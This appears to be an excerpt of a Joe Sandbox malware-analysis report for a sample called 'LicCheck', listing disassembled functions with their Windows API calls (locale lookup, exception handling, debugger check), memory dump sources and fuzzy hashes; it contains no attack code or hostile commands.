                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: cd71751a2c0f4648eeafa23726e76095f25e504f5d04d3d476dde6be3ed03cbe
                                                                                                    • Instruction ID: a2a356cf7971012c5d6e56ad345dd0e5b1386f07850b7d39588622bc1fd82129
                                                                                                    • Opcode Fuzzy Hash: cd71751a2c0f4648eeafa23726e76095f25e504f5d04d3d476dde6be3ed03cbe
                                                                                                    • Instruction Fuzzy Hash: 14310575D0121CDBDB20DFA4D989BCCBBB8BF08300F1041AAE409AB250EB759A848F55
                                                                                                    Function 007BD2AC Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD300
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD34A
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD410
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 661929714-0
                                                                                                    • Opcode ID: 17a51abeb3700b62a19bc9b2a6d87a8b425201fa38a2f58b85acc050b93945c6
                                                                                                    • Instruction ID: 692387843a5d34040290cfe76498b2b3a3efd88e68ce4bd0ccc7daadf52565fa
                                                                                                    • Opcode Fuzzy Hash: 17a51abeb3700b62a19bc9b2a6d87a8b425201fa38a2f58b85acc050b93945c6
                                                                                                    • Instruction Fuzzy Hash: 0C614771900617EBDB389F28C886BEA77A8EF04301F1441AAED15C6585FB3CED85CB60
                                                                                                    Function 007A9BF3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007A9CEB
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007A9CF5
                                                                                                    • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,?), ref: 007A9D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: 17ee3e56cda6fd51f57af49295b6e07cfc8049e57294393cf3e52313d07a6f96
                                                                                                    • Instruction ID: 799a6c4495b089ba6ff819e99ab7fe2c1fb180a1694cbd8cb7982f8b19f5fb7d
                                                                                                    • Opcode Fuzzy Hash: 17ee3e56cda6fd51f57af49295b6e07cfc8049e57294393cf3e52313d07a6f96
                                                                                                    • Instruction Fuzzy Hash: 3831B275901228DBCB21DF68D989B8CBBB8FF48310F6042DAE51CA7251E7749BC58F54
                                                                                                    Function 007B51E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,007B14F4,?,20001004,00000000,00000002,?,?,007B0AF6), ref: 007B5215
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: 0'y
                                                                                                    • API String ID: 2299586839-674645887
                                                                                                    • Opcode ID: f3837294afdbcaac504bfb1d35e567238812c753b37f12e1c7abe50db5fda356
                                                                                                    • Instruction ID: 30477b2081a83740b879ce6936fcf92f2f3cf9273c6b5c4e6f8bcc3dd93beb8c
                                                                                                    • Opcode Fuzzy Hash: f3837294afdbcaac504bfb1d35e567238812c753b37f12e1c7abe50db5fda356
                                                                                                    • Instruction Fuzzy Hash: FCE01A71505A2CBBCB122F61DC09FDE3B26FB44751F084414F905662618B7A9920AA94
                                                                                                    Function 007A5815 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007A582B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 2325560087-0
                                                                                                    • Opcode ID: 06d0e311c79860b566f267867ff6a436c828ddca3b60967a483c760425fc15ce
                                                                                                    • Instruction ID: 24477b3d8482f6ccfeee559b189245785099cdd593df413fc3ddeb3d0794ab7d
                                                                                                    • Opcode Fuzzy Hash: 06d0e311c79860b566f267867ff6a436c828ddca3b60967a483c760425fc15ce
                                                                                                    • Instruction Fuzzy Hash: C5514DB1A12A05CFEB14CFA8D8957AEB7F4FB85310F24C56AD405EB261D37CA940CB54
                                                                                                    Function 007BD4FF Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007BD553
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 3736152602-0
                                                                                                    • Opcode ID: 8bc757e3a356ced8d8c34bdfb0f42397e635c97d812f930e5a200246e6d794f2
                                                                                                    • Instruction ID: 8d28260fbefe687f7281e1cb8e025f4a9fd26ffde3c74223052281fa3d284e6c
                                                                                                    • Opcode Fuzzy Hash: 8bc757e3a356ced8d8c34bdfb0f42397e635c97d812f930e5a200246e6d794f2
                                                                                                    • Instruction Fuzzy Hash: AB217C7261521AABEB389F25DC46BFA77A8EF44318B14406AF902C7141FA3CAD508B64
                                                                                                    Function 007BD186 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • EnumSystemLocalesW.KERNEL32(007BD2AC,00000001,00000000,?,-00000050,?,007BD8DD,00000000,?,?,?,00000055,?), ref: 007BD1F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: c1602946e866cbda0c4f4f1840c949b95821ce02a3dfa96c7c9571bdc40a847c
                                                                                                    • Instruction ID: 72d9e643e48e9ae0baddd78c51b28c0b3440205211a1739a5ae88eb65d64731a
                                                                                                    • Opcode Fuzzy Hash: c1602946e866cbda0c4f4f1840c949b95821ce02a3dfa96c7c9571bdc40a847c
                                                                                                    • Instruction Fuzzy Hash: BA11E93A2007099FDB289F39C8957FAB791FF84358B19852DE94687B40E779BD42C740
                                                                                                    Function 007BD72E Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007BD4C8,00000000,00000000,?), ref: 007BD75A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 3736152602-0
                                                                                                    • Opcode ID: 8616610def448f9178be19beae719054bd1b0d8ad6eeeffa81c67ef40ca6f0df
                                                                                                    • Instruction ID: 5370908fc42ba8802f5f369b1ff7fdca50912c7a6c3060012dd70bb3e7ec47b4
                                                                                                    • Opcode Fuzzy Hash: 8616610def448f9178be19beae719054bd1b0d8ad6eeeffa81c67ef40ca6f0df
                                                                                                    • Instruction Fuzzy Hash: E6F08137610116BBDB389A348809BFE77A9EB40754F154568EC56A3180FE7CFE41C690
                                                                                                    Function 007BD221 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • EnumSystemLocalesW.KERNEL32(007BD4FF,00000001,00000000,?,-00000050,?,007BD8A1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 007BD26B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: 3070f78c28640229ba51b43ad25926901b43a403d54e3e253e12466b11aff283
                                                                                                    • Instruction ID: ee53eaa3665b53b2ab126109e09cdaaacdb06d2e426f68a7b977f29293d51352
                                                                                                    • Opcode Fuzzy Hash: 3070f78c28640229ba51b43ad25926901b43a403d54e3e253e12466b11aff283
                                                                                                    • Instruction Fuzzy Hash: E0F0C2362003445FDB245F799885BEA7B91FF81368B09842DF9068B690E6BAAC428650
                                                                                                    Function 007B4CBB Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007ADD02: EnterCriticalSection.KERNEL32(?,?,007B1989,00000000,007D40D8,0000000C,007B1950,?,?,007B2ACF,?,?,007B24DE,00000001,00000364,?), ref: 007ADD11
                                                                                                    • EnumSystemLocalesW.KERNEL32(007B4CAE,00000001,007D42A0,0000000C,007B50DD,00000000), ref: 007B4CF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: 30740a4a68b6c066a9fa5b9a5b28cf594235257c502ea99a1f2fe52b52da8925
                                                                                                    • Instruction ID: d9a79c448337152b28d284d19f8a3b43545c89e0a0fb252c6f6e3cc3b6832e80
                                                                                                    • Opcode Fuzzy Hash: 30740a4a68b6c066a9fa5b9a5b28cf594235257c502ea99a1f2fe52b52da8925
                                                                                                    • Instruction Fuzzy Hash: 0BF04F76A01604DFD700EF98E846B9D7BB1FB49721F10821BF401DB2A1CBBE59008B54
                                                                                                    Function 007BD13B Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • EnumSystemLocalesW.KERNEL32(007BD094,00000001,00000000,?,?,007BD8FF,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007BD172
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: 1f53b8b1b0618835d5bc3ab72309a951d48473e1550b589ec7844f612b55fe91
                                                                                                    • Instruction ID: daac3edeb72a7f4d1f884ad0a20d18a85b8eb16d7ca00a0a7882079927542fa2
                                                                                                    • Opcode Fuzzy Hash: 1f53b8b1b0618835d5bc3ab72309a951d48473e1550b589ec7844f612b55fe91
                                                                                                    • Instruction Fuzzy Hash: 78F0E536300209A7CB15AF39DC59BAABF95EFC2714F0B4059EA058B251D67EDD83C790
                                                                                                    Function 007A5CCC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00015CD8,007A5225), ref: 007A5CD1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 9b06f276c3d59efe7294ad26c11b07b60de8fb1975129d7e3449e1dc495c10f1
                                                                                                    • Instruction ID: 6331be0b4cbd1b7f2307b1e06a3f721325922452601d87e56fe0c094d5fcef17
                                                                                                    • Opcode Fuzzy Hash: 9b06f276c3d59efe7294ad26c11b07b60de8fb1975129d7e3449e1dc495c10f1
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 007BDA5F Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 28f842f379cfcab6bb501974b1b78bb8fd92ad0d0a9b68910126dc453dbe2cf6
                                                                                                    • Instruction ID: 779ddedc58d17547e8a282e130175c2ca9a3a9326e3396c67256bee6a869653a
                                                                                                    • Opcode Fuzzy Hash: 28f842f379cfcab6bb501974b1b78bb8fd92ad0d0a9b68910126dc453dbe2cf6
                                                                                                    • Instruction Fuzzy Hash: CBA011B030AA008B83008F32AA082083BAAAA002C0308C02AA808C8020EB2E80808F88
                                                                                                    Function 007BB2BB Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5b6064b1d285803d4cb0220968fdc1f1fa7642ad5c254f0c01c5dc199024f09b
                                                                                                    • Instruction ID: 814d12ecc4cc425aa54436e3229ea6d2c9732fb0d4f2f650aec5b108dce3504d
                                                                                                    • Opcode Fuzzy Hash: 5b6064b1d285803d4cb0220968fdc1f1fa7642ad5c254f0c01c5dc199024f09b
                                                                                                    • Instruction Fuzzy Hash: 5EE08C32911228EBCB14DBC9C908ACEF3ECFB44B00B150096F911D3211C2B4DE00C7D0
                                                                                                    Function 007AFF51 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0acb759024605fc42b6b8bdead4ad15610ee751142ab1ecb42ef976f49e53a40
                                                                                                    • Instruction ID: a44da2c7a3d5659b00e5f02f12658962a00a23296401805d7a9c62723af5d59d
                                                                                                    • Opcode Fuzzy Hash: 0acb759024605fc42b6b8bdead4ad15610ee751142ab1ecb42ef976f49e53a40
                                                                                                    • Instruction Fuzzy Hash: FCC08C380009008ACE29891082753EA7364FBD37C6F80059CF8020B652CB1E9C82EB80
                                                                                                    Function 007993A0 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00799429
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00799475
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0079954D
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007995E2
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00799607
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0079960C
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00799611
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: ,}$,}$,}$,}$,}$bad locale name$false$true
                                                                                                    • API String ID: 3559308103-3624877754
                                                                                                    • Opcode ID: 55904ca38fa2c0c2b6777159cd97788a32a4ff1a3fe88838c375cd2bc5c95b69
                                                                                                    • Instruction ID: fa9f8ab528eb01a055fdbdb83418c7a8ea8a1699742aae53cc0fa5e12c081b3e
                                                                                                    • Opcode Fuzzy Hash: 55904ca38fa2c0c2b6777159cd97788a32a4ff1a3fe88838c375cd2bc5c95b69
                                                                                                    • Instruction Fuzzy Hash: E37190B0D01348DBEF10DFA8D84979EBBB4AF45300F14411DE915A7382E7BEAA05CBA1
                                                                                                    Function 00798B80 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798BB6
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798BD8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798BF8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798C1F
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798C98
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00798CE4
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00798CFE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798D93
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00798DA0
